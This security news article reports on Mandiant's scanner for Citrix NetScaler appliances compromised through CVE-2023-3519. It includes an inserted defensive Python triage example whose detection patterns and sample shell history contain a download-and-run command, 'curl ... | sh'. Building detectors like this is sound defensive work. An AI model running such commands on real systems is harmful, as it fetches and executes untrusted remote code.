As active attacks against the Citrix NetScaler ADC and Gateway vulnerability (CVE-2023-3519) disclosed last month continue, researchers at Mandiant have released a new tool that can spot potentially compromised appliances.
The tool is based on information that Mandiant and Citrix specialists gathered during incident response engagements over the last few weeks, and it bundles a set of indicators of compromise. It scans appliances for artifacts known to be associated with post-exploitation activity on compromised devices, including suspicious running processes, file system paths associated with malware, suspicious commands in the shell history, and files with suspicious permissions or ownership.
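As an added illustration of the kinds of checks the article describes (this is not Mandiant's tool or its indicators), here is a small Python triage routine run over constructed sample data; the web-root path, process names, command patterns and cut-off timestamp are assumptions, not values from the page.

```python
import re
import stat
from collections import namedtuple

FileRec = namedtuple("FileRec", "path uid mode mtime")  # owner uid, st_mode bits, epoch seconds
ProcRec = namedtuple("ProcRec", "pid ppid name")

WEB_ROOT = "/PLACEHOLDER/webroot"       # assumed; not a real NetScaler path
WEB_SERVER_NAMES = {"httpd", "nginx"}   # assumed web server process names
INTERPRETERS = {"sh", "bash", "perl", "python"}
HISTORY_PATTERNS = [
    r"\b(curl|wget)\b.*\|\s*(sh|bash)\b",  # download piped straight into a shell
    r"\bbase64\s+(-d|--decode)\b",         # decoding a staged payload
    r"\bchmod\s+\+x\b",                    # making a dropped file executable
]

def scan_history(lines):
    """Shell-history lines that match any suspicious-command pattern."""
    return [l for l in lines if any(re.search(p, l) for p in HISTORY_PATTERNS)]

def scan_files(files, cutoff_ts, expected_uid=0):
    """(path, reasons) for web-root files with odd permissions, owner or mtime."""
    out = []
    for f in files:
        if not f.path.startswith(WEB_ROOT):
            continue
        why = [label for hit, label in (
            (f.mode & stat.S_IWOTH, "world-writable"),
            (f.uid != expected_uid, f"owner uid {f.uid}"),
            (f.mtime > cutoff_ts, "modified after cutoff")) if hit]
        if why:
            out.append((f.path, why))
    return out

def scan_processes(procs):
    """PIDs of interpreters whose parent is the web server: a webshell's process tree."""
    parent_name = {p.pid: p.name for p in procs}
    return [p.pid for p in procs
            if p.name in INTERPRETERS and parent_name.get(p.ppid) in WEB_SERVER_NAMES]

# Constructed sample data, not taken from any real appliance.
CUTOFF_TS = 1689552000  # assumed baseline (mid-July 2023 disclosure)
SAMPLE_HISTORY = ["ls /var/log", "curl http://203.0.113.5/x | sh", "base64 -d /tmp/p > /tmp/q"]
SAMPLE_FILES = [FileRec(WEB_ROOT + "/index.html", 0, 0o644, 1680000000),
                FileRec(WEB_ROOT + "/s.php", 1001, 0o666, 1690000000),
                FileRec("/var/log/ns.log", 0, 0o644, 1690000000)]
SAMPLE_PROCS = [ProcRec(1, 0, "init"), ProcRec(200, 1, "httpd"), ProcRec(321, 200, "sh")]
```

On a real appliance the three inputs would come from the shell history file, a directory walk with `os.stat`, and the process table; any hit is a lead for a forensic review, not proof of compromise.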
The Citrix vulnerability became public in mid-July, but attackers had been exploiting it as a zero day for several weeks beforehand. Multiple attack groups have targeted the bug, which allows unauthenticated remote code execution. Public exploit code is also available, which has made things even more dangerous for organizations running affected devices. The vulnerability affects the Citrix NetScaler ADC and Gateway products, and researchers last week found more than 7,000 vulnerable devices online. On Tuesday, Dutch security firm Fox-IT said it had found nearly 2,000 Citrix NetScaler appliances that had been backdoored as a result of exploitation of this bug.
"An adversary appears to have exploited CVE-2023-3519 in an automated fashion, placing webshells on vulnerable NetScalers to gain persistent access. The adversary can execute arbitrary commands with this webshell, even when a NetScaler is patched and/or rebooted. At the time of writing, more than 1900 NetScalers remain backdoored. Using the data supplied by Fox-IT, the Dutch Institute of Vulnerability Disclosure has notified victims," Fox-IT said.
Mandiant’s scanner is designed to identify potentially compromised devices, but it isn’t a panacea. It does not remove any existing malware or webshells, and organizations with affected devices should still install the available Citrix updates.
“The goal of the scanner is to analyze available log sources and system forensic artifacts to identify evidence of successful exploitation of CVE-2023-3519,” Mandiant said in the description of the tool.
“There are limitations in what the tool will be able to accomplish, and therefore, executing the tool should not be considered a guarantee that a system is free of compromise. For example, log files on the system with evidence of compromise may have been truncated or rolled, the system may have been rebooted, an attacker may have tampered with the system to remove evidence of compromise and/or installed a rootkit that masks evidence of compromise.”
The Mandiant scanner is available on GitHub.